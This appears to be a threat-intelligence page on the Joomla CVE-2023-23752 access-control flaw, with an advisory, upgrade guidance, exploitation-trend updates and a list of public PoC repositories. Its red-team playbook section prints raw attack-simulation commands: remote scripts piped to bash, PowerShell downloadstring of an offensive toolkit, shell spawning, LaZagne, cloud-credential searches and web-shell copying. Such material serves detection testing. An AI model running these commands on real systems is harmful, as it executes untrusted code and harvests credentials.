CVE-2023-23752
Overview
This vulnerability is an improper access control flaw in Joomla! CMS webservice endpoints. The root cause is a failure to enforce adequate authorization checks on specific API endpoints, allowing unauthenticated users to bypass access restrictions. The affected component is the Joomla! webservice interface present in versions 4.0.0 through 4.2.7.
Vulnerability Description
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
Impact
An attacker can exploit this vulnerability to gain unauthorized access to user password information without any authentication or user interaction. This exposure compromises the confidentiality of user accounts, potentially allowing attackers to perform credential-based attacks or escalate privileges. The breach of sensitive authentication data can lead to broader system compromise and undermine trust in the affected Joomla! CMS installation.
Solution
Upgrade Joomla! CMS to version 4.2.8 or later, where the improper access control issue in webservice endpoints has been addressed. Detailed patch instructions and advisory information are available in the Joomla! security center advisory 894 at https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html. No alternative workarounds are specified; applying the official update is required to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Joomla! versions 4.0.0 through 4.2.7 arises from an improper access check that permits unauthorized access to web service endpoints. This flaw is particularly concerning because it undermines the integrity of access controls that are fundamental to web application security. When access checks are not properly enforced, it allows malicious actors to interact with sensitive functionalities of the application without the necessary permissions. This could lead to unauthorized data retrieval, modification, or even the execution of administrative functions, depending on the nature of the web service endpoints exposed.
Attack vectors for exploiting this vulnerability can vary widely, but they typically involve sending crafted requests to the web service endpoints that bypass the intended access controls. An attacker could leverage tools such as Postman or curl to manipulate HTTP requests and gain unauthorized access to sensitive data or functionalities. For instance, if an endpoint is designed to retrieve user information, an attacker could exploit this vulnerability to access user data without authentication. Additionally, if the web service allows for administrative actions, the impact could be even more severe, leading to potential system compromise or data breaches.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Joomla! for their web presence. Unauthorized access to web service endpoints can lead to data leaks, loss of customer trust, and potential regulatory repercussions, especially if sensitive personal information is exposed. The business risk is compounded by the fact that many organizations may not have adequate monitoring in place to detect such unauthorized access attempts. This could result in prolonged exposure to the vulnerability, increasing the likelihood of exploitation and subsequent damage.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security strategy. Regularly updating Joomla! to the latest versions is crucial, as patches often address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any potential weaknesses in their web applications. Implementing robust logging and monitoring solutions can also help in detecting unauthorized access attempts in real-time, allowing for swift incident response. Furthermore, employing a Web Application Firewall (WAF) can provide an additional layer of protection by filtering and monitoring HTTP traffic to and from the web application.
In conclusion, the improper access check vulnerability in Joomla! poses a notable risk to organizations utilizing this platform. The potential for unauthorized access to sensitive web service endpoints can lead to significant data breaches and operational disruptions. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the threats posed by this and similar vulnerabilities. Continuous vigilance and proactive security measures are essential in safeguarding web applications in an ever-evolving threat landscape.
CSURFACE threat intelligence has detected a modest but consistent increase in activity targeting the Joomla! vulnerability CVE-2023-23752. While the overall exploit probability score remains stable, our telemetry indicates a discernible uptick in scanning and probing attempts against affected Joomla! versions. This subtle rise in adversary interest is accompanied by the emergence of additional publicly available proof-of-concept exploits and mass exploitation tools, which lowers the barrier for opportunistic attackers to leverage this vulnerability. Although ransomware involvement remains unconfirmed, the expanded availability of exploitation resources could facilitate broader abuse, potentially leading to unauthorized data exposure or service disruption. Consequently, this evolving landscape warrants heightened attention from defenders, as the risk of exploitation is incrementally increasing even if the immediate threat level remains medium. Continuous monitoring of exploitation trends and tool proliferation is essential to anticipate any shift toward more aggressive or widespread attacks.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-23752, accompanied by the emergence of several new proof-of-concept tools that facilitate automated scanning and mass exploitation. Our telemetry indicates that threat actors are increasingly leveraging these publicly available resources to probe vulnerable Joomla! instances, broadening the attack surface. Although the EPSS score remains stable, the proliferation of exploitation frameworks signals a shift toward more accessible and scalable attack methodologies. This development elevates the operational ease for adversaries, potentially accelerating unauthorized access incidents. While ransomware usage linked to this vulnerability remains unconfirmed, the expanded toolkit could enable opportunistic threat actors to integrate CVE-2023-23752 into multi-stage campaigns. Consequently, the threat level should be regarded as trending upward within the medium severity category, underscoring the need for vigilant monitoring of exploitation trends and rapid response capabilities.
Update 3 — July 04, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-23752, with telemetry indicating a substantial increase in exploitation attempts targeting Joomla! webservice endpoints. This surge coincides with the emergence of multiple new proof-of-concept exploits and mass scanning tools that lower the barrier for adversaries to identify and exploit vulnerable instances. Although the overall risk score remains stable and ransomware involvement is still unconfirmed, the expanded availability of automated exploitation frameworks significantly enhances the operational tempo and reach of potential attackers. For defenders, this development signals a heightened likelihood of unauthorized access incidents and underscores the necessity for increased vigilance in monitoring webservice traffic and anomalous access patterns. Consequently, while the vulnerability’s severity rating remains medium, the threat landscape is evolving toward greater immediacy and scale, warranting closer attention to exploitation trends.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Joomla | Joomla\! | All |
cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Joomla API Improper Access Checks
auxiliary/scanner/http/joomla_api_improper_access_checks
|
h00die, Tianji Lab | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Joomla! v4.2.8 - Unauthenticated information disclosure | Alexandre ZANNI | webapps | php | - | View |
GitHub PoCs (48)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Acceis/exploit-CVE-2023-23752
Joomla! < 4.2.8 - Unauthenticated information disclosure
|
Acceis | 94 | 16 | 2023-03-24 | View |
|
ThatNotEasy/CVE-2023-23752
Perform With Mass Exploiter In Joomla 4.2.8.
|
ThatNotEasy | 35 | 6 | 2023-04-09 | View |
|
Ap0dexMe0/CVE-2023-23752
Perform With Mass Exploiter In Joomla 4.2.8.
|
Ap0dexMe0 | 34 | 6 | 2023-04-09 | View |
|
z3n70/CVE-2023-23752
simple program for joomla CVE-2023-23752 scanner for pentesting and educational purpose
|
z3n70 | 17 | 4 | 2023-02-24 | View |
|
K3ysTr0K3R/CVE-2023-23752-EXPLOIT
A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7
|
K3ysTr0K3R | 16 | 4 | 2023-12-04 | View |
|
gibran-abdillah/CVE-2023-23752
Bulk scanner + get config from CVE-2023-23752
|
gibran-abdillah | 7 | 7 | 2023-03-09 | View |
|
keyuan15/CVE-2023-23752
Joomla 未授权访问漏洞 CVE-2023-23752
|
keyuan15 | 12 | 1 | 2023-03-01 | View |
|
adhikara13/CVE-2023-23752
Poc for CVE-2023-23752
|
adhikara13 | 7 | 2 | 2023-04-04 | View |
|
Sweelg/CVE-2023-23752
Joomla未授权访问漏洞
|
Sweelg | 4 | 3 | 2023-06-16 | View |
|
Youns92/Joomla-v4.2.8---CVE-2023-23752
CVE-2023-23752
|
Youns92 | 6 | 0 | 2023-11-28 | View |
|
ifacker/CVE-2023-23752-Joomla
CVE-2023-23752 Joomla 未授权访问漏洞 poc
|
ifacker | 3 | 3 | 2023-02-23 | View |
|
0xNahim/CVE-2023-23752
|
0xNahim | 5 | 0 | 2023-03-26 | View |
|
Jenderal92/Joomla-CVE-2023-23752
python 2.7
|
Jenderal92 | 0 | 5 | 2023-03-11 | View |
|
karthikuj/CVE-2023-23752-Docker
Joomla Unauthorized Access Vulnerability (CVE-2023-23752) Dockerized
|
karthikuj | 4 | 0 | 2023-03-25 | View |
|
Fernando-olv/Joomla-CVE-2023-23752
This Python implementation serves an educational purpose by demonstrating the exploitation of CVE-2023-23752. The code p...
|
Fernando-olv | 4 | 0 | 2023-12-01 | View |
|
Saboor-Hakimi/CVE-2023-23752
CVE-2023-23752 nuclei template
|
Saboor-Hakimi | 3 | 0 | 2023-02-18 | View |
|
Vulnmachines/joomla_CVE-2023-23752
Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
|
Vulnmachines | 3 | 0 | 2023-02-20 | View |
|
yusinomy/CVE-2023-23752
Joomla! 未授权访问漏洞
|
yusinomy | 2 | 1 | 2023-02-18 | View |
|
ibaiw/joomla_CVE-2023-23752
未授权访问漏洞
|
ibaiw | 2 | 1 | 2023-02-23 | View |
|
blacks1ph0n/CVE-2023-23752
Joomla Unauthorized Access Vulnerability
|
blacks1ph0n | 2 | 1 | 2023-10-30 | View |
|
GhostToKnow/CVE-2023-23752
开源,go多并发批量探测poc,准确率高
|
GhostToKnow | 2 | 0 | 2023-03-09 | View |
|
0xWhoami35/CVE-2023-23752
|
0xWhoami35 | 2 | 0 | 2024-04-11 | View |
|
adriyansyah-mf/CVE-2023-23752
|
adriyansyah-mf | 0 | 2 | 2023-03-07 | View |
|
h3x0v3rl0rd/CVE-2023-23752
Joomla! v4.2.8 - Unauthenticated information disclosure
|
h3x0v3rl0rd | 1 | 0 | 2024-05-04 | View |
|
wangking1/CVE-2023-23752-poc
CVE-2023-23752 poc
|
wangking1 | 1 | 0 | 2023-02-23 | View |
|
AlissonFaoli/CVE-2023-23752
Joomla Unauthenticated Information Disclosure (CVE-2023-23752) exploit
|
AlissonFaoli | 1 | 0 | 2023-10-20 | View |
|
Pushkarup/CVE-2023-23752
Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).
|
Pushkarup | 1 | 0 | 2023-10-25 | View |
|
r3dston3/CVE-2023-23752
|
r3dston3 | 1 | 0 | 2023-11-30 | View |
|
JohnDoeAnonITA/CVE-2023-23752
CVE-2023-23752 Data Extractor
|
JohnDoeAnonITA | 1 | 0 | 2024-03-12 | View |
|
MrP4nda1337/CVE-2023-23752
simple program for joomla scanner CVE-2023-23752 with target list
|
MrP4nda1337 | 0 | 1 | 2023-07-26 | View |
|
TindalyTn/CVE-2023-23752
Mass Scanner for CVE-2023-23752
|
TindalyTn | 1 | 0 | 2023-12-20 | View |
|
AkbarWiraN/Joomla-Scanner
CVE-2023-23752
|
AkbarWiraN | 1 | 0 | 2023-04-06 | View |
|
Sharma01672/traveller-htb
Traveller is an Easy Linux machine featuring a Joomla 4.2.7 travel booking website vulnerable to CVE-2023-23752, an unau...
|
Sharma01672 | 0 | 0 | 2026-06-21 | View |
|
Marwan651/Joomla-CMS-Full-Lifecycle-Pentest
A comprehensive full-lifecycle penetration testing project on Joomla 4.2.5 exploiting CVE-2023-23752 inside a Dockerize...
|
Marwan651 | 0 | 0 | 2026-05-14 | View |
|
Rival420/CVE-2023-23752
Joomla! < 4.2.8 - Unauthenticated information disclosure exploit
|
Rival420 | 0 | 0 | 2024-02-19 | View |
|
Aureum01/CVE-2023-23752
A bash automation that exploits the vulnerable endpoints for the Joomla! API 4.0 - 4.2.7
|
Aureum01 | 0 | 0 | 2024-08-11 | View |
|
sw0rd1ight/CVE-2023-23752
Poc for CVE-2023-23752 (joomla CMS)
|
sw0rd1ight | 0 | 0 | 2023-02-21 | View |
|
Ge-Per/Scanner-CVE-2023-23752
|
Ge-Per | 0 | 0 | 2023-04-08 | View |
|
Ly0kha/Joomla-CVE-2023-23752-Exploit-Script
Joomla CVE-2023-23752 Exploit Script
|
Ly0kha | 0 | 0 | 2023-11-29 | View |
|
C1ph3rX13/CVE-2023-23752
CVE-2023-23752 Joomla Unauthenticated Information Disclosure
|
C1ph3rX13 | 0 | 0 | 2023-12-13 | View |
|
JeneralMotors/CVE-2023-23752
An access control flaw was identified, potentially leading to unauthorized access to critical webservice endpoints withi...
|
JeneralMotors | 0 | 0 | 2023-12-18 | View |
|
gunzf0x/CVE-2023-23752
Binaries for "CVE-2023-23752"
|
gunzf0x | 0 | 0 | 2023-12-19 | View |
|
mariovata/CVE-2023-23752-Python
Joomla! < 4.2.8 - Unauthenticated information disclosure
|
mariovata | 0 | 0 | 2024-04-15 | View |
|
0xx01/CVE-2023-23752
A simple bash script to exploit Joomla! < 4.2.8 - Unauthenticated information disclosure
|
0xx01 | 0 | 0 | 2024-04-28 | View |
|
yTxZx/CVE-2023-23752
|
yTxZx | 0 | 0 | 2023-10-20 | View |
|
shellvik/CVE-2023-23752
Joomla Information disclosure exploit code written in C++.
|
shellvik | 0 | 0 | 2023-12-29 | View |
|
svaltheim/CVE-2023-23752
|
svaltheim | 0 | 0 | 2023-11-30 | View |
|
hadrian3689/CVE-2023-23752_Joomla
|
hadrian3689 | 0 | 0 | 2023-12-11 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-23752 |
| developer.joomla.org |
GitHub CVE
vendor-advisory
|
https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-23752 |